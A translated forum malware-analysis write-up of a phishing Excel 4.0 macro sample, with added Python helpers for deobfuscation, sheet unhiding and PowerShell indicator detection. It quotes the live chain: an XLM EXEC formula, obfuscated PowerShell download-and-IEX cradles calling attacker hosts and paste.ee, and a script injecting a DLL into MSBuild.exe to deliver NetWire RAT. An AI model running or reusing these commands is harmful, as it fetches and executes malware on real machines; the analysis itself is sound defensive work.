
Analyzing the malicious Excel 4.0 macro carried by a phishing email

jishuzhain | Kanxue Academy (看雪学院) | 2021-03-07

This article is a featured post from the Kanxue Forum.

Kanxue Forum author ID: jishuzhain





Introduction


To do good work one must first sharpen one's tools. Since the file at hand is a macro virus, Office has to be installed locally; the environment used in this article is Office 2016. Open the sample in Excel.

Why does it look nothing like a normal Excel spreadsheet? If you bother to OCR the image, it says roughly that macros must be enabled before the content can be viewed. The whole point is to lure the user into enabling macros, so whenever a document prompts you to enable macros the moment it opens, the right move is simply not to enable them.


The author has not had much hands-on contact with macro viruses (and is, admittedly, a tools person), but has used the Python tool oletools before. In a Python 2.7 environment the install command is: pip install oletools.


Once installed, use mraptor (MacroRaptor) from oletools to check whether the file is suspicious; it flags the file as suspicious, as shown below:


Trying to extract the malicious macro with olevba fails with a parse error, as shown below:


Anyone without much prior exposure to macro viruses will be baffled at this point. The reason is that this sample contains no VBA macro at all; what was detected is an Excel 4.0 macro (a technique that has been around longer than I have been alive, truly), whose sheet attribute is set to hidden.


Excel 4.0 macros are not covered in depth here, because the reference links describe them in detail; if you are interested, go straight to the links at the end of the article, otherwise just follow the steps below.

Although the malicious code cannot be extracted manually this way, a shortcut is to obtain the executed commands from a sandbox, as shown below:


The first-stage command:

powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt')

The second-stage command is the content of scan.txt, which is executed as script via IEX (Invoke-Expression):

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e 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 | &('I'+'EX')
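Both stage commands above rely on cheap string tricks (backtick escapes inside bare words, 'a'+'b' concatenation, quoted member names, random casing) that defeat naive string matching in a SIEM. The following is an added example, not code from the original post, that normalizes a PowerShell command line and scores the indicators a defender would alert on. The base64 payload after /e is not reproduced on this page, so the stage-two string below carries a labelled placeholder in its place; the indicator list and scoring are the example's own choices.

```python
import re

# Stage-one command as quoted in the post, and the visible part of stage two.
# The /e payload is not on the page, so a constructed placeholder stands in.
STAGE1 = ("powershell -command IEX (new`-OB`jeCT('Net.WebClient'))"
          ".'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt')")
STAGE2 = ("PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e "
          "<base64_payload_omitted> | &('I'+'EX')")

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize(cmd):
    """Undo the obfuscations seen in the sample so indicators can be matched.

    Backticks are dropped wholesale (this also eats escapes such as `n, which is
    acceptable for indicator matching but not for re-executing the command)."""
    s = cmd.replace("`", "")
    while True:  # fold 'a'+'b'+'c' chains until nothing changes
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if folded == s:
            break
        s = folded
    s = re.sub(r"\.'([A-Za-z_]\w*)'", r".\1", s)      # .'DownloadString' -> .DownloadString
    s = re.sub(r"&\('([A-Za-z_]\w*)'\)", r"\1", s)    # &('IEX') -> IEX
    return s.lower()


# Indicator names and regexes are this example's own choice (constructed).
INDICATORS = [
    ("download_cradle", re.compile(r"net\.webclient|downloadstring|downloadfile")),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression")),
    # -e / -ec / -enc / -EncodedCommand and their slash forms; -ExecutionPolicy must not match
    ("encoded_command", re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s")),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b")),
    ("bypass_policy", re.compile(r"-ex\w*\s+bypass")),
]


def score(cmd):
    """Return (normalized command, list of indicator names that fired)."""
    norm = normalize(cmd)
    hits = [name for name, rx in INDICATORS if rx.search(norm)]
    if norm != cmd.lower():           # normalization changed something: obfuscation present
        hits.append("string_obfuscation")
    return norm, hits


if __name__ == "__main__":
    for cmd in (STAGE1, STAGE2):
        norm, hits = score(cmd)
        print(norm)
        print("  indicators:", ", ".join(hits))
```

Running the block on the two stage commands shows the URL and DownloadString call in clear text for stage one, and the hidden-window, policy-bypass and encoded-command flags for stage two; the string_obfuscation indicator alone is a useful low-noise signal, since legitimate scripts rarely spell cmdlets with backticks.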





How to remove the hidden attribute?


For this sample the sheet cannot be unhidden by right-clicking: the macro sheet does not appear in the document at all, so there is no unhide option in the context menu. The oledump tool can assist here, with the following command:

oledump_V0_0_50>oledump.py -p plugin_biff.py --pluginoptions "-o BOUNDSHEET -a"  C:\Users\onion\Desktop\Dokumentation.xls\Dokumentation.xls


This yields the sheet's position sequence 51 AA 02 00 01, where in the state byte 0x00 means visible, 0x01 means hidden and 0x02 means very hidden.


Edit the hex value directly by hand, as shown below:


After saving and reopening, the macro sheet appears, but the macro code still cannot be seen because the font colour was set to white, another anti-analysis trick to add confusion.


Select the cells and change the font colour to make the macro code visible.
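The hex patch above edits the BOUNDSHEET record of the BIFF8 Workbook stream: 4 bytes of stream position, then a flags byte whose low two bits hold the hidden state (0 visible, 1 hidden, 2 very hidden), then a sheet-type byte, then the sheet name. The following is an added example, not part of the original post or of oletools/oledump, that parses those records, reports each sheet's state and type, and clears the hidden bits without changing the stream length. The BIFF fragment it parses is constructed inline (a BOF placeholder, a hidden macro sheet named Macro1 and a visible worksheet named Sheet1) and is not the sample's real stream.

```python
import struct

BOUNDSHEET = 0x0085
STATE_NAMES = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPES = {0x00: "worksheet", 0x01: "Excel 4.0 macro sheet", 0x02: "chart", 0x06: "VBA module"}


def _record(rid, data):
    """BIFF record: 2-byte id, 2-byte length, payload (all little-endian)."""
    return struct.pack("<HH", rid, len(data)) + data


def _boundsheet(stream_pos, hs_state, sheet_type, name):
    """BOUNDSHEET payload: lbPlyPos(4) | hsState(1) | dt(1) | cch(1) | flags(1) | name."""
    raw = name.encode("latin-1")
    return _record(BOUNDSHEET, struct.pack("<IBB", stream_pos, hs_state, sheet_type)
                   + bytes([len(raw), 0]) + raw)


# Constructed stand-in for a Workbook globals substream (not the sample's real bytes).
SAMPLE_STREAM = (
    _record(0x0809, bytes(16))                        # BOF placeholder
    + _boundsheet(0x0002AA51, 0x01, 0x01, "Macro1")   # hidden Excel 4.0 macro sheet
    + _boundsheet(0x00000E11, 0x00, 0x00, "Sheet1")   # visible worksheet
    + _record(0x000A, b"")                            # EOF
)


def iter_records(stream):
    off = 0
    while off + 4 <= len(stream):
        rid, length = struct.unpack_from("<HH", stream, off)
        yield off, rid, stream[off + 4: off + 4 + length]
        off += 4 + length


def list_sheets(stream):
    """Return one dict per BOUNDSHEET record with name, hidden state and sheet type."""
    sheets = []
    for off, rid, data in iter_records(stream):
        if rid != BOUNDSHEET or len(data) < 8:
            continue
        pos, flags, dt = struct.unpack_from("<IBB", data, 0)
        cch, opts = data[6], data[7]
        if opts & 1:   # fHighByte set: name is UTF-16LE
            name = data[8:8 + 2 * cch].decode("utf-16-le", "replace")
        else:
            name = data[8:8 + cch].decode("latin-1", "replace")
        sheets.append({
            "name": name,
            "stream_pos": pos,
            "state_offset": off + 4 + 4,        # offset of the hsState byte within the stream
            "state": flags & 0x03,
            "state_name": STATE_NAMES.get(flags & 0x03, "?"),
            "type": dt,
            "type_name": SHEET_TYPES.get(dt, "?"),
        })
    return sheets


def unhide_all(stream):
    """Clear the hidden bits of every BOUNDSHEET record; returns (patched stream, names changed)."""
    buf = bytearray(stream)
    changed = []
    for s in list_sheets(stream):
        if s["state"] != 0:
            buf[s["state_offset"]] &= ~0x03
            changed.append(s["name"])
    return bytes(buf), changed


if __name__ == "__main__":
    for s in list_sheets(SAMPLE_STREAM):
        print(f"{s['name']:<8} {s['state_name']:<12} {s['type_name']}  hsState at 0x{s['state_offset']:X}")
    patched, names = unhide_all(SAMPLE_STREAM)
    print("unhidden:", names)
```

On a real .xls the Workbook stream first has to be pulled out of the OLE container (for instance with olefile's OleFileIO.openstream('Workbook')); because the patch keeps the stream length unchanged it can be written back in place. Note that the macro sheet type byte (0x01) is itself a strong triage signal even before any unhiding.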





How to extract the macro code manually?


Since the text is displayed as blank, copy it, create a new Excel 4.0 (XLM) macro sheet, paste it into that sheet, select all and change the text colour; the code can then be read. And there it is: an obvious trace of a PowerShell script.


Tidied up, the complete code is as follows:

=RETURN()p://putin-malwrhunterteams.com/scan.txt');exit=EXEC("powershell -command " & "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'t" & A9588)

The response content retrieved:

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e 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 | &('I'+'EX')

Decoding this further gives the deobfuscated PowerShell script.


Reading the script carefully, the first part is junk code plus added delays, and at the end it uses CallByName to download and execute the next stage.

Addresses: //paste.ee/r/e49u0 and //paste.ee/r/dlOMz.


Function ZhZg{ param($xIxfmTFLHvQRN , $GPtEltKSlSBIDwArOphrhFygxx , $qfjydzoRxRgPADeXfddPJKQhakVwARMHovTnCTXIPf)$DiSCThogPCXterQgFZbEkrVLGUAeHqzAD = 'tSyJnGHnXzweeXOWUIycCLNHwyhKY';$CWpvyyivlUxxUVObqdPlWq = 'bfi';$rMoZw = 'yxapiZPoYWefF';$rsVIEumCLUOQPuqjwvAiVYomHDAxyTXwZrMy = 'gVBbwlGbSJVxoajeWVTDiBAupDrwRqXhsrQZy';$YmiLoue = 'Jt';$RCWtvJeVHmstJJbloFxJJgQwgVWMGQpuyH = 'oB';}$ximErUgtYCNIquMkflmZMZmROrwyvCInjA = 'OXEovQnx';If ('zxZuiObPBcbXwUpzYi' -eq 'VtaYqmxMbwrJZcRSRRBPgatlHYkSCOoXhobbYZjHkB') {$SK = 'CveCYiWSRvzoQRCfK';$HTbkAqtrhuff = 'bbpVpoApGBPWfbjIRFFqnLq';$SunIhAcnlVYNbwNrJXASMNVPJiQoaomPkxDu = 'sI';$YclKCW = 'UsNgQKXeEZYyyknMwiIcdtSrROvt';$cKMnBvwMIWFMTyVbtKVlPobutDbZWOB = 'dubOMKwpqAoLDP';$vwPYEaIUoi = 'txTXptVqiYWHOiNf';}$PzQqetgcHqxoVanfuRyVTKvqMglYpApquOEpSaP = 'nuiCX';DO{$ZbtSLTmpNgYbknzltwSwgGbBQHGdk = 'APUbBdKGSdURaa';$gJTVMTXjxBSzrCDMJFygIGIlW = 'ndobOgBYkxnHXvdgXZidSDP';$LMbtUZAhzlgtuVnm = 'TSGZBhDCcjiDsIjOXQCEIEKwFIlPjlBmvfzlIsJeYr';$qSeGdxeXFkipPHJTswnSrhwHNJxFeGYgQMTeb = 'ISF';$wBNpjezYQikY = 'JV';$sTzYtyMBZDnerqnVNdku = 'XZTGFqqvsLKIFJoSgUyoLQgqVhauOKWYbcUugSn';$Nyi= $Nyi + 1;} While ($Nyi -ne 6)While ($WGgrdVmg -ne 6) {$DgJmFiHtclYPvgholhcoulNhqSFkoNzutuLdNmVuNBD = 'OsaZyCsoJsFRTcvncXEPleWBVEbyL';$WGgrdVmg= $WGgrdVmg + 1;$atifTxrflmVLkAptKkriRqwowjWZD = 'atcbRLjnJxvxlSuatVLctrHdRkwtjjbSbrLbiJj';$WGgrdVmg= $WGgrdVmg + 1;$JWbtmTEetVqAObAjmzJgPpDZWd = 'tHSrkmhSWPNqxfRzOtb';$WGgrdVmg= $WGgrdVmg + 1;$zrbp = 'zCOUTBXJyLXbdFOhJdUYIMAyqpgvZV';$WGgrdVmg= $WGgrdVmg + 1;$fdI = 'jTyDNqgyUuYknMWqNHQanBQdeUbjcIs';$WGgrdVmg= $WGgrdVmg + 1;$VVfOLaGhcNfEREtiDfoYNhxhCUZtOxWMCbPRhIenA = 'yZVMMabtgwTTknYxLrANTerTCpocBv';$WGgrdVmg= $WGgrdVmg + 1;}Function ovqrmSkyxRPOmuQyQcrskoQGLPaHTLvqRAVFOBl{ param($BXe , $XLqHzRVQZsirctjxmmnPTiCKWlzrlv , $vFEAmUkBvxOSbTyLi , $yOOkOPoJgkNSdfdZ , $lYsxcCkrSFQbqYZQZngEKqoLdozocTioB , $MnqVVMdswKYhpMnCDswVcvjgToDw , $yWcZKLlaERUbSu , $nvymAZQqrgERDJBhJhdynwIfBB , $zacuKAFsYqQwpigksFtiQDkL)$fxsRRWGLdjAatTJAfkgXs = 
'elVYxmYLjPrTMnvzopJPejLVx';$qVZeVOfCSGvsYTmRAkjZHVEgvrNdyvZAbzvDmEudoJ = 'pDwQpcNjamXqVQtjdA';$EXg = 'RYXievqGlxAPczaYAlLyNEJantVQcmFxIHfsRuin';$fmsUBQkDcBTLhhMPxvlaadysDGUTiGF = 'YOiR';$FlclMAkllbaScU = 'wMJCnARvvQUVvQmSzvzsJJpNdOGReuBGmGGMFfePoqg';$seoVyIaXcbqnWwZZtz = 'BOOjpKaNTQjEScV';$yZlTWTedKQSpJGFWoZf = 'dvzKYu';$GtXXLBa = 'zHguhklZZrlENKNPtwPsDZb';$bNXkmsHnifFPHfyUrWaSmpswgHeOmiXaglSTNBm = 'kxWiExHNyuAhzIImUbDfOtBAHfiW';$eHqkuioTKriA = 'QrhqaXdgzmxGRrw';$aZPlATnJxFZTSJjVfyc = 'SRFKtgeVs';$crrxkSTOPwEYsVyJNqCcbSOnD = 'UEsUoSRU';$ibVYRCQjfEuYjMjSoSQBJcDtc = 'OWuImGYsPhsRkZLjjjJjkrJCAzATSFXbwTnupXSnAr';$BZXiqpatUksNXMsInGFZJJRUQmQuLRVjtuHccQJds = 'DrDGQhwPehu';}$nrICREYghDOJUcFP = 'WwchxGaQKVjxwmoobHPUazFELez';Function jHfOVmAuARmkqIAxMGHkUVbA{ param($ulnbhkIkSjplhlGipjlRZUsVp , $EXrXVTHxWYiHQMeDWrRemosWOcshCZtSmlfltuOW , $kPiAhSYnWyADLIPeUItaZuwfP , $ehtJcdvBCZKWgJTugbs , $adPGZlVvDpSCl , $oruMWWIKGqUy)$FWGQWZmbJloYbxPkRn = 'HcfNIMtjMNHOfetPQueesAI';$XLYlJrAChBsrZIxEdpZNCXIuhhzp = 'JhHTyqwnIaUMEgdlCpIwZBCaufzDeEbsKO';$TlYbRBQUPFBxqeIfsqsNI = 'hYTrtIEybCqJKAdOrvJgnUthJY';$YjBRAPoEzIZIHQQdzGh = 'IBezxEcrMeliUmfPak';}$reg = ('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g');[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0').Replace("@@", "44").Replace("!", "78")|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz').replace('$$','0x')|IEX;[k.Hackitup]::exe('MSBuild.exe',$f)
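Stripped of the junk functions, the script's tail uses three small primitives: the -f format operator to reassemble the method name ('{2}{0}{1}{3}' -f 'dSt','rin','Downloa','g'), [Char] casts spliced into string concatenation to build the two URLs, and .Replace() chains applied to the downloaded text before it is piped to IEX ("$$" to "0x" turns the second paste into a byte-array literal). The following is an added example, not code from the original post, that resolves each primitive statically so the analyst does not have to execute the script. The expressions it resolves are quoted from the script above; the paste.ee content is not on this page, so a constructed "$$"-encoded byte string stands in for the second download.

```python
import re


def resolve_format(template, args):
    """Emulate PowerShell's '{2}{0}{1}{3}' -f a,b,c,d reordering."""
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], template)


_TOKEN = re.compile(r"'([^']*)'|\[Char\](\d+)", re.IGNORECASE)


def resolve_char_concat(expr):
    """Join 'literal' + [Char]N + ... pieces into the string PowerShell would build."""
    return "".join(lit if code == "" else chr(int(code)) for lit, code in _TOKEN.findall(expr))


def apply_replace_chain(text, chain):
    """Emulate a chain of .Replace(old, new) calls applied before the IEX."""
    for old, new in chain:
        text = text.replace(old, new)
    return text


_HEX_BYTE = re.compile(r"0x([0-9A-Fa-f]{1,2})")


def recover_byte_array(text):
    """Turn a '0x4D,0x5A,...' literal (what [Byte[]]$f = ... | IEX evaluates) into bytes."""
    return bytes(int(h, 16) for h in _HEX_BYTE.findall(text))


def is_pe(blob):
    return blob[:2] == b"MZ"


# Expressions quoted from the decoded script:
REG_EXPR = ("{2}{0}{1}{3}", ["dSt", "rin", "Downloa", "g"])
URL1_EXPR = "'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0'"
URL2_EXPR = "'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz'"

# Constructed stand-in for the second paste (the real content is not on this page):
FAKE_PASTE_2 = "$$4D,$$5A,$$90,$$00,$$03,$$00,$$00,$$00"


def stage_summary():
    """Resolve method name, URLs and the (stand-in) byte array without running anything."""
    method = resolve_format(*REG_EXPR)
    urls = [resolve_char_concat(URL1_EXPR), resolve_char_concat(URL2_EXPR)]
    blob = recover_byte_array(apply_replace_chain(FAKE_PASTE_2, [("$$", "0x")]))
    return {"method": method, "urls": urls,
            "payload_len": len(blob), "payload_is_pe": is_pe(blob)}


if __name__ == "__main__":
    print(stage_summary())
```

Resolving the pieces shows the CallByName target is DownloadString, the two URLs are http://paste.ee/r/e49u0 and https://paste.ee/r/dlOMz ([Char]80 yields an upper-case P, which .NET treats case-insensitively in the scheme), and the second download is evaluated into a byte array that begins with an MZ header, consistent with the DLL handed to the MSBuild.exe injection described next.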

The first downloaded file, after decoding, turns out to be an already-processed DLL.


Its real name is Hackitup; from the following it can be roughly judged that process injection follows, and combined with the decoded script above, the injected process is MSBuild.exe.


The second downloaded file, on brief analysis, is the NetWire RAT remote-access trojan.





The C2 is surely dead by now, but here it is anyway.





References


  • https://www.virustotal.com/gui/file/67fd76d01ab06d4e9890b8a18625436fa92a6d0779a3fe111ca13fcd1fe68cb2/details

  • https://app.any.run/tasks/b37be5b0-1460-4dd1-992e-72ec74cec8fe/

  • https://app.any.run/tasks/25084eac-2823-4887-8f90-42623b01c2ae/

  • https://app.any.run/tasks/0ddc9dc1-0ff9-43c7-b456-35a296998809/

  • https://www.freebuf.com/articles/others-articles/236919.html

  • https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

  • https://zeronohacker.com/analysis-excel-4-0-marco-from-field-office-sample.html

  • https://www.jianshu.com/p/d2bab95ec62c












Kanxue ID: jishuzhain

https://bbs.pediy.com/user-678001.htm

  *This article is an original work by jishuzhain of the Kanxue Forum; when republishing, please credit the Kanxue community.

